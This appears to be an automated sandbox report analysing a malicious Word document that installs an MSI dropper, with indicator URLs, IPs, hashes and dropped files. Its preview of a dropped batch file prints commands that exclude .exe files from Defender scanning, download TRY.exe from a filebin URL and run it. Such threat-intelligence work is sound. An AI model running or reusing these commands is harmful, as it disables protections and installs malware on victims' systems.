https://filebin.net/rf43v6qzghbj7h7b/TRY.exeexpand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.drtrue
  • Avira URL Cloud: malware
unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:535fae.ipi.2.drtrue
  • Avira URL Cloud: malware
unknown
https://filebin.net/rf43v6qzghbj7h7b/~DFECA159C20646BB57.TMP.2.drtrue
  • Avira URL Cloud: malware
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
87.238.33.8
situla.bitbit.netNorway
39029REDPILL-LINPRORedpillLinproNOfalse
185.47.40.36
filebin.netNorway
39029REDPILL-LINPRORedpillLinproNOtrue

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:611840
Start date and time: 20/04/202209:18:032022-04-20 09:18:03 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 35s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:12543_0008858249_FWDOUTSTANDING_20200604.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.expl.winDOC@19/23@5/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 58.5%)
  • Quality average: 35.5%
  • Quality standard deviation: 35.4%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 24
  • Number of non-executed functions: 32
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, conhost.exe
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

TimeTypeDescription
09:19:15API Interceptor1365x Sleep call for process: msiexec.exe modified
09:19:24API Interceptor1x Sleep call for process: icacls.exe modified
09:19:31API Interceptor31x Sleep call for process: powershell.exe modified
09:19:36API Interceptor17x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
87.238.33.82543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
    SWIFT pagesa .docGet hashmaliciousBrowse
      SWIFT pagesa .docGet hashmaliciousBrowse
        SWIFT pagesa .docGet hashmaliciousBrowse
          Shahini Ferramenta.docGet hashmaliciousBrowse
            DHL NOTIFICATION.docGet hashmaliciousBrowse
              DHL NOTIFICATION.docGet hashmaliciousBrowse
                oZPv3ngzrx.exeGet hashmaliciousBrowse
                  185.47.40.362543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                    2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                        SWIFT pagesa .docGet hashmaliciousBrowse
                          SWIFT pagesa .docGet hashmaliciousBrowse
                            SWIFT pagesa .docGet hashmaliciousBrowse
                              Holdings.docGet hashmaliciousBrowse
                                Holdings.docGet hashmaliciousBrowse
                                  Shahini Ferramenta.docGet hashmaliciousBrowse
                                    Shahini Ferramenta.docGet hashmaliciousBrowse
                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                        DHL NOTIFICATION.docGet hashmaliciousBrowse
                                          oZPv3ngzrx.exeGet hashmaliciousBrowse
                                            876Vfmj5EI.exeGet hashmaliciousBrowse
                                              876Vfmj5EI.exeGet hashmaliciousBrowse
                                                https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrsGet hashmaliciousBrowse
                                                  https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwnGet hashmaliciousBrowse
                                                    PO 91277.docGet hashmaliciousBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      situla.bitbit.net2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 87.238.33.8
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 87.238.33.8
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 87.238.33.8
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 87.238.33.8
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 87.238.33.8
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 87.238.33.8
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 87.238.33.8
                                                      oZPv3ngzrx.exeGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      filebin.net2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      oZPv3ngzrx.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      876Vfmj5EI.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      876Vfmj5EI.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Zm1Oz6lCLO.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      RYDdv7X9e8.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      gPm4nLttxA.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      tVzelearRj.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      4viHjPSIXn.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      REDPILL-LINPRORedpillLinproNO2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      oZPv3ngzrx.exeGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      876Vfmj5EI.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      876Vfmj5EI.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrsGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwnGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      REDPILL-LINPRORedpillLinproNO2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      Holdings.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      Shahini Ferramenta.docGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      oZPv3ngzrx.exeGet hashmaliciousBrowse
                                                      • 87.238.33.7
                                                      876Vfmj5EI.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      876Vfmj5EI.exeGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrsGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwnGet hashmaliciousBrowse
                                                      • 185.47.40.36

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      05af1f5ca1b87cc9cc9b25185115607d2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      3.ppamGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      UT.dotGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      WNBHXO.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      NALC-salaries.xlsGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      Form.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      42#U0440.xlsGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      14.ppamGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      ba#U011f#U0131#U015f sertifikas#U0131.xlsxGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      14.ppamGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      PO16101545739.docxGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      Final Purchase Order_0422.ppamGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      SP_04132022.docxGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      Final Purchase Order_0422.ppamGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      PO-8MMM-TSO.docxGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      #U043e#U0444#U0435#U0440#U0442#U043022.xlsxGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      00000051.docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      Commande HILTI MAROC.xlsxGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8
                                                      SWIFT pagesa .docGet hashmaliciousBrowse
                                                      • 185.47.40.36
                                                      • 87.238.33.8

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                        2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                          2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                            C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmp2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                              2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                                                                2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):9216
                                                                  Entropy (8bit):4.161759538213247
                                                                  Encrypted:false
                                                                  SSDEEP:96:6/4AVtYE5uI3U33ZsYEFL2l4oK3B24CxkZFivEwj98l1vu+X0jUrw62tbaAGi7A:6/4AVtF368vB27xkZF5P50jcw60aWA
                                                                  MD5:D295AD2809D07DCE046748F3AF1C5035
                                                                  SHA1:9E774C670AB933D4E984EFCE44B815781FDDCB5A
                                                                  SHA-256:BC4DCE07AAA38FFD6445499BFF0DA6C48F5400C2A7FAA04B3F5BE2D273DE319E
                                                                  SHA-512:9E7F25992E9B672FF95802703EDB822737BFCAF61425910B3DE80304AAD18D562FD270928EC68EA370E5604AF037A2BF0897D8AFFC87ABAAA6D3D94F202BEAC0
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, Author: Nils Kuhnert
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02CF5D71-875F-4179-8CDC-9768D4E5C0E6}.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1024
                                                                  Entropy (8bit):0.05390218305374581
                                                                  Encrypted:false
                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\thai.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):5.038473612824116
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDGKSSJJFIGtxVfHeGAFddGeWLERy44ASVOGSJJFIGtATH3x85MHVWfILGYgPe:hSG8G3V/eGgdEWRy44ASQ98GSLh8uWfi
                                                                  MD5:0187F7CF14FF509BAFFEEDC6909AEF04
                                                                  SHA1:01689D0CD0070F66D2FA1465E79C43641A52574D
                                                                  SHA-256:C63EB9290E361D2474C8C8EA29869CA413005CC033146B54E30C3363C5B81170
                                                                  SHA-512:63C8B8F1214172258D137FBD166912A17053A032CCFBE188E71369A10D4D8F5F8CF97A109BC7E0C8DE19EADF7A29855A224C2092887191F8F38974012BB66F2F
                                                                  Malicious:false
                                                                  Preview:@echo off..powershell -command "Set-MpPreference -ExclusionExtension ".exe"..powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"..start TRY.exe

                                                                  C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files.cab

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Microsoft Cabinet archive data, 155244 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):155244
                                                                  Entropy (8bit):6.820072420859643
                                                                  Encrypted:false
                                                                  SSDEEP:3072:avGygixtiq1P5GWp/icKAArDZz4/9GhbkrNEO1Yq:eUEpKy/90QEc
                                                                  MD5:2A683F9BE589B6F5581EA6298C95AFBC
                                                                  SHA1:B78112E20E2E465B58D803BF93ED458FE8492161
                                                                  SHA-256:8A64B66F67D4C199154659B5BB448173B46C1ADB1B2F9AE24CEFF17C858B96D5
                                                                  SHA-512:731B78A6DAABD45E375681F6CE60FD42A429C655EE93784B4599DDE78936DB307370A96D64F6B289DBDBA033F18B192F6DD47720E4976F6ABF5B49B3490348D9
                                                                  Malicious:false
                                                                  Preview:MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B............................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmp

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):155136
                                                                  Entropy (8bit):6.821026780783546
                                                                  Encrypted:false
                                                                  SSDEEP:3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
                                                                  MD5:96DF7B0C491646EFC2E5F2E9F0443B8B
                                                                  SHA1:560F0295ABE71FEFFF38912C1121B27E40237FE5
                                                                  SHA-256:4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
                                                                  SHA-512:E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
                                                                  Malicious:false
                                                                  Joe Sandbox View:
                                                                  • Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
                                                                  • Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
                                                                  • Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):155136
                                                                  Entropy (8bit):6.821026780783546
                                                                  Encrypted:false
                                                                  SSDEEP:3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
                                                                  MD5:96DF7B0C491646EFC2E5F2E9F0443B8B
                                                                  SHA1:560F0295ABE71FEFFF38912C1121B27E40237FE5
                                                                  SHA-256:4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
                                                                  SHA-512:E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
                                                                  Malicious:false
                                                                  Joe Sandbox View:
                                                                  • Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
                                                                  • Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
                                                                  • Filename: 2543_0008858249_FWDOUTSTANDING_20210420.doc, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\msiwrapper.ini

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1412
                                                                  Entropy (8bit):3.6357831688439908
                                                                  Encrypted:false
                                                                  SSDEEP:24:f3dX8DW8dfja/0vZ4MBlolESIFEqHmnqHmLyDqHmVo+TGTlh+Bl/rB:fe7Z4MB6lmFxGqGL7GjklS/V
                                                                  MD5:CE0A48B68AFABF1CB63A84452E99662A
                                                                  SHA1:D79EB8F957A252FB363FF36F67B39E1FA1524468
                                                                  SHA-256:4C86CD17EDA9F4A42B361023E7AE6E1CCCEE9AEB547F375A3D2936217A5ED713
                                                                  SHA-512:AB8D97D03F2EF4BE45CD7CEABE8ACE93FF9266BFCA6CB4D939A06F9E8A57343C5CE559BDB004A4D81ABAC3AB7ADE9B6D9761014B0F60A27871FB60E0E8CC6B16
                                                                  Malicious:false
                                                                  Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.a.d.m.i.n.i.s.t.r.a.t.o.r.s...B.a.s.e.N.a.m.e.=.T.R.Y...e.x.e...C.a.b.H.a.s.h.=.8.a.6.4.b.6.6.f.6.7.d.4.c.1.9.9.1.5.4.6.5.9.b.5.b.b.4.4.8.1.7.3.b.4.6.c.1.a.d.b.1.b.2.f.9.a.e.2.4.c.e.f.f.1.7.c.8.5.8.b.9.6.d.5...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.S.O.U.R.C.E.D.I.R.*...U.I.L.e.v.e.l.=.2...F.o.c.u.s.=.n.o...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.5.8.b.8.4.a.1.d.-.9.a.6.6.-.4.a.e.e.-.8.a.4.3.-.f.e.b.2.0.6.e.0.8.9.b.1.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.5.8.b.8.4.a.1.d.-.9.a.6.6.-.4.a.e.e.-.8.a.4.3.-.f.e.b.2.0.6.e.0.8.9.b.1.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.r.a.m.e.t.e.r.s.=...R.u.n.A.f.t.e.r.I.n.s.t.a.

                                                                  C:\Users\user\AppData\Local\Temp\~DF471414B699306DAC.TMP

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\~DF79ACBA3F38B53A85.TMP

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP

                                                                  Download File
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):26624
                                                                  Entropy (8bit):4.023285459983812
                                                                  Encrypted:false
                                                                  SSDEEP:384:G9FbvNwIWWwxN6rX0jb4e/9wCwQDtASlRGfafyZ:80WwGLc4elwx6Gfaf
                                                                  MD5:AEE6E4E3E1679CAB2BC9711D046AE750
                                                                  SHA1:EE2D2003C4E7208C030246BE3556934955D33100
